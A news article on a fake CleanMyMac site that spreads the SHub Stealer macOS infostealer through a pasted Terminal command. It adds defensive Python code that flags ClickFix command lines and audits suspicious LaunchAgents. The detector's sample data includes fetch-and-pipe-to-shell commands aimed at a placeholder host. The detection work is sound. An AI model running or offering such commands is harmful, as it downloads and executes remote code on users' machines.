Mac users looking for a reliable system cleanup tool are being lured into a malware trap. Cyber security researchers have spotted a fraudulent website impersonating the well-known macOS utility CleanMyMac, tricking visitors into installing a credential-stealing malware called SHub Stealer that can also tamper with cryptocurrency wallet applications.
A Fake Installer That Asks Users to Run a Terminal Command
The campaign relies on social engineering in which victims are asked to run a command in Terminal, which installs the malware while appearing like a legitimate installation step. This is a classic example of a ClickFix attack on macOS devices, where attackers trick users into manually executing a command that downloads and runs the malicious payload.
1. Press Command (⌘) + Space to open Spotlight Search
2. Type "Terminal" and press Return to launch it
3. Once the Terminal window is open, you can proceed with the steps below
Installation via Terminal command
1. Copy the installation command above.
2. Open the terminal on your device and paste the command, then press the "Return" button.
3. Enter your device password and confirm the installation.
According to Malwarebytes’ blog post, once executed, the command first displays a message referencing the legitimate CleanMyMac website, giving the impression that the installation is proceeding normally. In reality, it decodes a hidden link and downloads a script from a remote server, which runs immediately. Because the user executes the command themselves, macOS protections such as Gatekeeper are bypassed.
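A defender-side check for the command pattern just described, added here as an example and not taken from the Malwarebytes write-up or the campaign itself: it runs heuristic rules over constructed command lines (the domain and encoded string are placeholders) and flags ones that decode a hidden URL and pipe the download straight into a shell.

```python
import re
from typing import Dict, List

# Constructed sample command lines, as a shell-history or EDR process collector
# might record them. None is taken from the real campaign; the domain is a placeholder.
SAMPLE_COMMANDS = [
    'echo "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaS5zaA==" | base64 -d | xargs curl -fsSL | sh',
    "curl -fsSL https://example.invalid/setup.sh | bash",
    "brew install --cask cleanmymac",
    "xattr -d com.apple.quarantine ~/Downloads/Tool.app",
    "ls -la ~/Library/LaunchAgents",
]

# Heuristic rules for the ClickFix pattern: an encoded URL is decoded, fetched and
# piped straight into a shell. They are generic heuristics, not SHub signatures.
RULES = [
    ("decode-in-pipeline", re.compile(r"\bbase64\b[^|]*(-d|--decode)")),
    ("download-to-shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(xargs\s+)?(sh|bash|zsh)\b")),
    ("decoded-url-fetch", re.compile(r"\bbase64\b[^|]*(-d|--decode)[^|]*\|\s*xargs\s+(curl|wget)\b")),
    ("quarantine-removal", re.compile(r"\bxattr\s+(-\w+\s+)*-d\s+com\.apple\.quarantine\b")),
]

def classify_command(cmd: str) -> List[str]:
    """Return the names of every rule the command line trips, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmd)]

def severity(hits: List[str]) -> str:
    """Rank: a decoded payload fetched into a shell is the strongest ClickFix signal."""
    if "download-to-shell" in hits and "decode-in-pipeline" in hits:
        return "high"
    return "medium" if hits else "none"

def triage(commands: List[str]) -> Dict[str, str]:
    """Map each flagged command line to its severity; clean lines are omitted."""
    return {c: severity(h) for c in commands if (h := classify_command(c))}

if __name__ == "__main__":
    for cmd, level in triage(SAMPLE_COMMANDS).items():
        print(f"[{level}] {cmd}")
```

The same rules can be pointed at `~/.zsh_history` or at process-creation events from an EDR; the pipeline shape, not the specific domain, is what they key on.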
The Malware Doesn’t Target Russian Devices
After the initial script runs, the malware performs several checks before continuing. One of the first is a keyboard language test that looks for Russian-language layouts. If such a layout is detected, the program exits immediately and reports a blocked event to the attacker’s server.
This form of geofencing is frequently seen in malware linked to Russian-speaking cybercrime groups. By avoiding machines likely located in Russia or neighboring countries, operators reduce the chance of attracting attention from local authorities.
If the system passes these checks, the malware sends system information to a command-and-control server. The transmitted data includes the device’s external IP address, hostname, macOS version, and keyboard locale, along with a unique identifier used to track each infected machine.
Password Harvesting and Stealing Crypto
The next phase focuses on gaining deeper access to the system. The malware downloads an AppleScript payload that closes the Terminal window and displays a password prompt designed to mimic a legitimate macOS dialog box.
The prompt asks the user to enter their system password, claiming that “System Preferences” requires authentication. While the message includes a grammatical mistake, many users may still enter their credentials without noticing.
If the password is entered, the malware verifies it using macOS system tools and can retry up to ten times until a valid password is obtained. With the correct password, the attacker gains access to the macOS Keychain, which stores saved passwords, Wi-Fi credentials, application tokens, and private keys.
Other than collecting credentials and browser data, SHub Stealer also interferes with cryptocurrency wallet applications. Researchers observed the malware modifying several popular wallets, including Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite.
These modifications allow attackers to display fake recovery or security prompts inside the wallet interface. Victims may see a message asking them to enter their recovery seed phrase for verification or security updates. Once entered, the seed phrase is transmitted to a remote endpoint controlled by the attackers, allowing them to fully access and drain the victim’s crypto funds.
Persistence Hidden Behind a Google-Like Update Service
To remain active on the infected Mac, SHub installs a persistent background task using a LaunchAgent. The file name mimics Google’s legitimate Keystone updater and is configured to run every minute. Each execution launches a hidden script that maintains communication with the command-and-control infrastructure, allowing attackers to issue additional commands or collect more data over time.
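A LaunchAgent audit built around the persistence traits described above, added as an example and not code from the researchers or the campaign: it flags agents whose label borrows Google's Keystone naming but whose executable is not in Google's update directory (assumed to be the standard per-user install path), agents that fire every minute, and agents that hand a hidden script to a shell. The two sample plists are constructed.

```python
import plistlib
from pathlib import Path
from typing import Dict, List

# Google's real Keystone updater lives under .../Library/Google/GoogleSoftwareUpdate/
# (assumed standard install); a Keystone-style label run from anywhere else is suspect.
GOOGLE_UPDATE_DIR = "/Library/Google/GoogleSoftwareUpdate/"
SCRATCH_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3"}

def audit_plist(plist: Dict) -> List[str]:
    """Heuristic findings for one LaunchAgent dictionary; an empty list means nothing odd."""
    findings = []
    label = str(plist.get("Label", "")).lower()
    args = [str(a) for a in plist.get("ProgramArguments") or [plist.get("Program", "")]]
    if ("keystone" in label or "google" in label) and GOOGLE_UPDATE_DIR not in args[0]:
        findings.append("lookalike-label")
    interval = plist.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:  # "configured to run every minute"
        findings.append("runs-every-minute")
    # Script paths in scratch space or dot-directories are typical of stealer persistence
    if any(a.startswith(SCRATCH_DIRS) or any(p.startswith(".") for p in a.split("/")) for a in args):
        findings.append("hidden-or-scratch-path")
    if Path(args[0]).name in INTERPRETERS:  # launchd starting a shell rather than a binary
        findings.append("interpreter-launcher")
    return findings

def scan_directory(directory: str) -> Dict[str, List[str]]:
    """Audit every .plist in a directory such as ~/Library/LaunchAgents."""
    results = {}
    for entry in sorted(Path(directory).expanduser().glob("*.plist")):
        try:
            with open(entry, "rb") as fh:
                hits = audit_plist(plistlib.load(fh))
        except Exception as exc:  # a plist that will not parse still merits a look
            hits = [f"unparseable: {exc}"]
        if hits:
            results[str(entry)] = hits
    return results

# Constructed samples (not recovered from the campaign): a legitimate-looking agent and
# a lookalike that runs a hidden shell script every minute.
LEGIT_LOOKING = {
    "Label": "com.google.keystone.agent",
    "ProgramArguments": ["/Users/alice/Library/Google/GoogleSoftwareUpdate/Agent.app/Contents/MacOS/Agent"],
    "StartInterval": 3600,
}
LOOKALIKE = {
    "Label": "com.google.keystone.update",
    "ProgramArguments": ["/bin/bash", "/Users/alice/.config/.update/agent.sh"],
    "StartInterval": 60,
}
```

Run `scan_directory("~/Library/LaunchAgents")` (and the system-wide LaunchAgents and LaunchDaemons folders) to list only the plists that trip a heuristic; a legitimate Keystone agent should come back clean.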
Researchers believe that the consistency of the infrastructure across the modified wallet apps, including shared API endpoints and identifiers, suggests the operation is controlled by a single actor using a centralized backend system.
macOS Malware Activity Is Increasing
The campaign is one of several recent attacks aimed at macOS users. In recent months, researchers have reported several campaigns targeting Apple users with credential-stealing malware. One campaign involved Python-based infostealers disguised as installers for artificial intelligence tools, designed to steal browser sessions and saved credentials from Mac systems.
Another operation used fake invitations to a popular tech podcast as bait to distribute the AMOS infostealer, which also targeted crypto wallets. More recently, researchers uncovered malicious add-ons disguised as legitimate extensions for the OpenClaw project, again aimed at stealing cryptocurrency assets from macOS users.
Taken together, these incidents show how attackers are increasingly targeting macOS for cryptocurrency and browser credentials. Therefore, download software only from the official developer site or the Mac App Store, and avoid running commands from unfamiliar websites.
